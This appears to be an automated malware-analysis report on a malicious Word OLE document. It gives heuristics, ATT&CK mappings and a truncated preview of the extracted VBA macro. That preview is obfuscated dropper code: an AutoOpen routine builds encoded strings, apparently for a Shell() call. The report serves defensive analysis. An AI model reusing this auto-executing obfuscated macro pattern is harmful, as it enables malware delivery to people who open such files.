MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious OLE document containing a VBA macro. The macro includes a call to the Shell() function, which is a strong indicator of malicious intent, likely to download and execute a second-stage payload. The presence of an AutoOpen macro further suggests automatic execution upon opening the document. While the specific payload is not directly visible, the technique is common for droppers.
Heuristics 6
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 110,663 bytes but its declared streams total only 32,627 bytes — 78,036 bytes (71%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17015 bytes |
SHA-256: 2f8dd559016d4b194238a71ebfa68eeba886e9c5d42c99cfe8899b17408426aa |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "QMNSoaAmVzfOJz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If uphZEG Xor 19 Then
Dim poQnC()
JWDRr = UwnOij + jplcSP
ziwPW = HviHL + UPzGLt
End If
If zhGaz Eqv KWhDMw Then
Dim Ccaao()
clYNfC = LdkiZi + GAQcVQ
EkNivN = RnYjW + NXbTaY + hjmwi + VRCMwF
End If
If YAKjk Eqv itqLCD Then
Dim PjZwCz()
vXzOA = rwPba + zfpWQk
iaoqbw = sFhcPw + NXACv + SzjdPl + FFaNIM
End If
If HjWSaZ <> QmLiSk Then
Dim oUUBX()
uKapUV = iUUCkt + PUfcIt + PqDHJ + wmtoK
dpzGhw = lHwSJ + ZHsUor + dZiTXi + Arrbf
End If
If PnSNwi Or HDTYu Then
Dim jNDSE()
QKDKdi = nEuQUm + wJTaG + NqWWLv + UbmnZW
End If
If kMcofz < zMnwld Then
Dim audMO()
aojziF = MRHqwD + Ozqlap
End If
hbWkwEoCimwP (WLJnKkiM + FooYO + OVqIum + CEzbanwA + DNwVnkddzl + hASSmvAn + mNHfsff + MnnhhCFYLwd + wNZEDt + mJbZi + jMJzG + KMIAAvfd)
If WdhFw And hnzcD Then
Dim lYLjiz()
ZGXLYz = qCpSSN + BTuJEn
bMGYp = bjoRR + qjSwRI
End If
End Sub
Attribute VB_Name = "KizjKpMjE"
Function WLJnKkiM()
If ofzzWN <> 13 Then
Dim GsiWs()
wQBzQ = MmWWoW + YHCOq
kjNJX = ibUKAD + VwMSHI
End If
If TISIL Eqv KoREis Then
Dim IXlHi()
mKrbV = wBPMo + GzrRbu
End If
fMkGhpbJV = "`ja ,S[7[L,@ [p" + "[b[q [d[E[p:[{[=" + "[y[ [n[g[6" + " od![ D[w[N[ [A[X[]"
If TmDGW Xor 6 Then
Dim YNZaL()
tGBbhz = PZvbcJ + ucqwr + RISXo + zIXop
dRMqqp = wLzjYK + wzQwWd
End If
If uRZnw > 4 Then
Dim QUtoZl()
BZwUvQ = jarlT + dQwlM + PSHvd + CopaZj
End If
If Lkodn = whrlF Then
Dim wrLDlB()
uvUbt = NYBrb + MBYGc
MChwi = vSUcF + NKVbpJ
End If
EoNTdaM = "[ os[2[ [j[g[_[ [I" + "[p[3[ [X[G" + "[r[ [h[{[e[ [M[)[J[" + " [x[C[i[ " + """" + "S8"
wWQLY = "[ [F[1[6[ [p[J[E" + "[ [-[X[C K[W[*[" + " [5[r[t[z[fs" + "[N[z[N&[Z[x" + """" + "[j" + "[x[e[6[g[x`[M"
If MlWGu Eqv bdTaoU Then
Dim MzYIbK()
QtdVb = caFBKi + ORfZiS
opnUo = WcqCQ + szlSH
End If
RjjjhMw = "[q[>[q[/[M[(" + "[^g[q[P`[j[][v" + "[z[c[#m[8[" + "/[w[\[h[+[5[_[^[G[" + "*[Bb[!a[=o[I[N[M[_"
If asEno < 2 Then
Dim qLHBj()
nHbPk = rjdVjA + OFUjvh + GoZsu + rdDDzN
End If
If PBXRP <> 8 Then
Dim VRuTz()
JnhbGJ = CXAjCl + pCdzY + zRHnR + FjDEh
End If
If FksDPS Xor MkEMEJ Then
Dim DVcLUQ()
ziiUm = NfaVSO + IVcjj
End If
If wDViw Or 5 Then
Dim hUIVZG()
oXOvH = ODjlXp + LOVLi
tdvSaG = nCviFC + zkzkj + uPHPRz + rTSzzq
End If
If mvFQJ <= 13 Then
Dim wVcdP()
UjJPT = vvbdrj + KkDzwS + NzwKk + UmZBWo
WwowTk = mbbJD + WwbuY
End If
hoGzqrjVWKj = "[$[c@[8[][h[r[A[G" + "[m-[>[g[j@[c[<" + "KY[![6[^" + """" + "[ [.[M[f"
WLJnKkiM = fMkGhpbJV + EoNTdaM + wWQLY + RjjjhMw + hoGzqrjVWKj
If DUjqnQ Or 19 Then
Dim hbntUM()
CJicf = jKiupI + itvfF + VvNCd + WnwwhY
pCTSzE = dNtlmB + zrofIn
End If
If LoGEdI >= iLAVuT Then
Dim OazaV()
IBbQc = XvJTZ + azriMs
aifilQ = MjdNi + RvhJMp + KlDYrb + UUXjOE
End If
End Function
Function FooYO()
If dSqzVH > RwkrTi Then
Dim hSWQQ()
aGqJhm = MtwdhW + ErWqH
End If
sCFHokY = "[j[)[?Kb`[1I[qK[" + "_O[F[c[y[8[*[t[" + "M[g[b[a[b[F[h[t[c" + "[A[l0[g[Is%[*[" + ">kS[=[a[F[" + "T[z[h[8[=[x[^&[9"
If bHkQpC < RsokGS Then
Dim bhSiP()
YzHJzb = qvjJM + ofjYRz + WbGpzQ + hPpXYo
NdzbS = pzVLf + PdrrI
End If
bGSvFAA = "[+[?[A[0[N[Q" + "[>[q[M[y[c[" + "5f[([![ [6[{[ ["
If EwrSL And 17 Then
Dim qfbGIk()
TbBkz = jzXGuJ + BHqXjW
OSRmhP = XKYODu + wBpHLD
End If
CMwjQass = "\[n[_[)[B[z[A[" + "H[=[7[B[G[]Q[E[F[N,[" + "*[![-[D[Q%u[c[y[b[Y" + "[U[Vi:&[Q[f[5[" + "I[v[C[X[2[7["
MwdpmBpCH = "a[A[w[E[^[6[ [b" + "[l@[y[([is[" + ">[0k[B[bK[t"
FooYO = sCFHokY + bGSvFAA + CMwjQass + MwdpmBpCH
If qwIkfi Eqv DamwKA Then
Dim OChLL()
wrrPcE = AQVTk + laqZfG + VVoRwn + rbEdrq
iwEsIa = nmFTOW + jXdCF
End If
If MHfJdC >= vqHsrw Then
Dim udQbi()
bLOQoz = WXIFD + TcTJn + EQHXp + PXETXD
End If
If dCaSo =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.